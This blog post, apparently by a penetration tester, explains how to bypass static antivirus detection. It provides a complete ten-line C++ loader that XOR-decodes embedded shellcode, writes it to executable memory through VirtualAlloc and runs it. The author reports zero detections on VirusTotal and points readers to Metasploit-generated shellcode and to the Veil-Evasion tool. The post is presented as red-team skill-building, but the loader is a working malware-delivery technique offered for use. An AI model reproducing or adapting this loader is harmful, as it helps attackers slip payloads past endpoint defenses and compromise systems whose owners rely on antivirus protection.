# Bypassing Static Antivirus With Ten Lines of Code

## Overview

I had originally set out to write a long winded blog post on different antivirus bypass techniques. I went through what was supposed to be step 1 of my guide and uploaded my binary to virustotal… and the binary got a 0/56 detection rate.

I believe that most of my readers would agree that bypassing most antivirus based solutions is not that hard, however we don’t all have the same skillsets; some of us have been at this longer than others. I occasionally bump in to some folks who solely rely on tools that generate binaries for them. These can be easily fingerprinted and flagged by antivirus solutions if the tooling becoems popular enough. This article is mainly intended to help those that haven’t considered writing their own AV bypasses.

## Existing Tooling

Before I dive in to the following tidbit of C++, I’d like to touch on a tool that is really good at producing binaries that almost always evade detection, Veil-Evasion (part of the Veil-Framework ). This tool is awesome (many thanks to @harmj0y and others for creating and contributing to this awesome project) and in almost all instances I have had to use it has not let me down. If it has, I blame people who keep generating binaries and then testing them on virustotal. Please stop doing that.

At any rate, if tools like Veil Evasion are so epic, why should you care about knowing how to slap togother a binary with a shellcode payload yourself? Well there are a number of reasons:

• People get busy and tools become deprecated
• The binaries generated by tools become fingerprintable; not the payload necessarily, but the compiled structure of the binary.
• As a penetration tester, it is a good skill to learn how to write, at least, basic AV bypasses. Ups your leet cred.. or so I hear.

## Simple Proof of Concept

  1 2 3 4 5 6 7 8 9 10  #include #include int main(int argc, char **argv) { char b[] = {/* your XORd with key of 'x' shellcode goes here i.e. 0x4C,0x4F, 0x4C */}; char c[sizeof b]; for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';} void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, c, sizeof c); ((void(*)())exec)(); } 

The above code creates a character array with shell code you can add, performs an XOR operation with the incredibly sophisticated key of lowercase ‘x’, allocates some memory, copies the character array in said allocated memory, and executes it. It may be worth highlighting that you will need to XOR your shellcode with your key of choosing (in this case ‘x’) before you put it in the above code and compile.

So you are probably looking at that and thinking ‘really?’ – I know how you feel. I’d like to stress that this is an incredible simple and most basic technique, yet its success is still rather surprising.

I originally wrote this example and tested it on virus total a while ago, but I did reanalyze the executable on virustotal at the time of publishing this post and found it still had a 0 detection rate.

The binary you generate will very likely not match the SHA256 of the binary I have tested; the binary I uploaded contained shellcode generated with the metasploit framework .